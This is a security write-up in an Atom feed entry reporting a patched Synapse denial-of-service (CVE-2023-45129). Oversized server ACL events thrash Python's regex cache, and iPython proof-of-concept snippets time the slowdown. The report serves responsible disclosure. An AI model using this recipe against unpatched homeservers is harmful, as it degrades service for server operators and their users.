<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="/_stylesheets/atom_stylesheet.xsl"?>
<entry
        xmlns="http://www.w3.org/2005/Atom"
        xmlns:pktz="https://pktz.fr/schema/"
>
    <title>ACL cache thrashing Synapse</title>
    <id>https://pktz.fr/matrix/security/2023-synapse-acl-cache/</id>
    <published>2023-10-17</published>
    <updated>2023-10-17</updated>
    <author>
        <name>Val Lorentz</name>
        <uri>https://valentin-lorentz.fr/</uri>
    </author>
    <pktz:keywords>
        Matrix, Synapse, CVE-2023-45129, GHSA-5chr-wjw5-3gq4
    </pktz:keywords>
    <content type="xhtml" xml:lang="en">
        <div xmlns="http://www.w3.org/1999/xhtml">
            <pktz:toc />

            <section>
            <h2 id="introduction">Introduction</h2>

<p>
    This article is a copy of a report I sent to Element through their YesWeHack bug bounty program.
    The vulnerability was <a href="https://github.com/matrix-org/synapse/security/advisories/GHSA-5chr-wjw5-3gq4">patched in Synapse 1.94.0.</a>
</p>

            </section>
            <section>
            <h2 id="description">Description</h2>

<p>
    On every batch of incoming PDUs, Synapse checks the sender against the list of hostname in the <code>m.room.server_acl</code> state event of the destination room.
    <br/>
    This event contains a list of patterns which can contain wildcards that are translated to regexps, then passed to Python's re module, which compiles and runs it.
</p>

<p>
    This is all usually pretty quick (~0.6ms with 500 patterns on a modern CPU; I used a Ryzen 5 PRO 5650G), but there is a degenerate case that can make it much slower (up to ~100ms).
</p>
            </section>
            <section>
            <h2 id="exploitation">Exploitation</h2>

<p>
    The annoying part is the regexp compilation, which takes ~20µs per regexp. This is usually unnoticeable, because Python has a 512-entries LRU cache and one usually doesn't usually compile this many regexp.
</p>

<p>
    However, large <code>m.room.server_acl</code> events cause 100% cache miss, by compiling over 512 patterns in the same order over and over. Here is an example of this threshold behavior (in an iPython shell, which provides the neat <code>%timeit</code> command):
</p>

<pre>
<![CDATA[
In [1]: import re

In [2]: l = [f'example{i}' for i in range(500)]

In [3]: re.purge()  # clear the cache, just to be safe

In [4]: %timeit for s in l:  re.compile(s)
71.5 µs ± 209 ns per loop (mean ± std. dev. of 7 runs, 10,000 loops each)

In [5]: l = [f'example{i}' for i in range(550)]

In [6]: re.purge()  # clear the cache again

In [7]: %timeit for s in l:  re.compile(s)
6.37 ms ± 42.4 µs per loop (mean ± std. dev. of 7 runs, 100 loops each)
]]>
</pre>

<p>
    As you can see, compiling 550 patterns instead of 500 causes the whole loop to be 100 times slower
</p>

<p>
By setting a m.room.server_acl event in a room with over 512 patterns (in fact, the higher the better), one can slow down the event throughput of Synapse's federation workers.
    In the examples below, I will use <code>["e0.uk", "e1.uk", ..., "e4999.uk"]</code>, which has many patterns but is small enough to fit in a PDU.
PoC
<br />
Again, in an iPython shell:
</p>

<pre>
<![CDATA[
In [1]: from synapse.federation.federation_server import server_matches_acl_event; from tests.federation.test_federation_server import _create_acl_event; import re, json

In [2]: e = _create_acl_event({"allow": ["*"], "deny": [f"e{i}.uk" for i in range(500)]})  # build a "small" m.room.server_acl event

In [3]: re.purge()

In [4]: %timeit server_matches_acl_event("evil.com", e)
620 µs ± 849 ns per loop (mean ± std. dev. of 7 runs, 1,000 loops each)

In [5]: e = _create_acl_event({"allow": ["*"], "deny": [f"e{i}.uk" for i in range(5000)]})  # larger m.room.server_acl event

In [6]: re.purge()

In [7]: %timeit server_matches_acl_event("evil.com", e)
115 ms ± 719 µs per loop (mean ± std. dev. of 7 runs, 10 loops each)

In [8]: len(json.dumps({"allow": ["*"], "deny": [f"e{i}.uk" for i in range(5000)]}))  # check it's well under the PDU limit <https://github.com/matrix-org/synapse/blob/3b0083c92adf76daf4161908565de9e5efc08074/synapse/api/constants.py#L25>
Out[8]: 58916
]]>
</pre>

<p>
    By setting such a large <code>m.room.server_acl</code> event, every Synapse server in a room will waste ~100ms on every incoming batch of PDU for the room, from any other server. This means a single worker can be tied up with only 10 events per second in that room.
</p>

            </section>
            <section>
            <h2 id="risk">Risk</h2>

<p>
    Abusers who can join a room they control from a specific homeserver can make that homeserver considerably slower.
    <br />
    Actually, this is already happening accidentally in <a href="matrix:r/matrix:matrix.org">Matrix HQ</a>, which currently has 623 banned hostnames, which is high enough to make checks take 13ms:
</p>

<pre>
<![CDATA[
In [9]: e = _create_acl_event({"allow": ["*"], "deny": [f"e{i}.uk" for i in range(600)]})

In [10]: re.purge()

In [11]: %timeit server_matches_acl_event("evil.com", e)
13.1 ms ± 25.9 µs per loop (mean ± std. dev. of 7 runs, 100 loops each)
]]>
</pre>

<p>
    And even when Matrix HQ had under 512 hostnames, having its incoming PDUs interleaved with other rooms which had other hostnames might have partially triggered it.
</p>
            </section>
            <section>
            <h2 id="remediation">Remediation</h2>

<aside>
    <p>
        Synapse fixed the issue while <a href="https://github.com/matrix-org/synapse/pull/16360">rewriting entirely their ACL matching in Rust</a>.
        <br />
        For the sake of completeness, this section describes my initial suggestions to Synapse developers.
    </p>
</aside>

<p>
    A quick workaround would be for Synapse to use a larger cache. For example, with 5M entries in the cache, it would require setting up 1000 such rooms, and sending PDUs to them in a constant order, in order to trigger the degenerate case. That might be good enough. (And definitely avoids the accidental case.)
</p>

<p>
    Fixing completely is hard though. When my own software (an IRC bot) accidentally hit this case, <a href="https://github.com/progval/Limnoria/blob/922b00c8c31b888a0c567e51c335fa07ae08007a/src/ircutils.py#L224-L269">I implemented my own cache, which never expires compiled regexps as long as the original hostmask is still used somewhere</a>.
    <br />
    But that only works because IRC bots keep the whole hostmask set in memory from start to shutdown. That probably wouldn't work for Synapse workers, which have to fetch it from the database every time.
</p>

<p>
    An option that might work for Synapse would be to write every room's compiled regexps to a more persistent cache (eg. postgresql), using Python's pickle module to serialize. This seems to give a nice runtime:
</p>

<pre>
<![CDATA[
In [1]: import re, pickle

In [2]: l = [f'example{i}' for i in range(550)]

In [3]: pickled_l = pickle.dumps(l)

In [4]: %timeit pickle.loads(pickled_l)
13.2 µs ± 43.8 ns per loop (mean ± std. dev. of 7 runs, 100,000 loops each)
]]>
</pre>

            </section>
            <section>
            <h2 id="timeline">Timeline</h2>
<dl>
    <dt><time>2023-03-22</time></dt>
    <dd>Reported to Element through their YesWeHack bug bounty program.</dd>
    <dt><time>2023-07-03</time></dt>
    <dd>Confirmed by Element, who awarded me a bug bounty.</dd>
    <dt><time>2023-09-21</time></dt>
    <dd><a href="https://github.com/matrix-org/synapse/pull/16360">Synapse developers at Element wrote a patch</a></dd>
    <dt><time>2023-09-26</time></dt>
    <dd>Patch was merged</dd>
    <dt><time>2023-10-10</time></dt>
    <dd><a href="https://github.com/matrix-org/synapse/releases/tag/v1.94.0">Synapse 1.94.0</a> was released with the patch</dd>
    <dt><time>2023-10-14</time></dt>
    <dd>I noticed the fix, asked Element for news on the status of my report.</dd>
    <dt><time>2023-10-17</time></dt>
    <dd>Element notified me it is indeed fixed and public.</dd>
</dl>
            </section>
        </div>
    </content>
</entry>
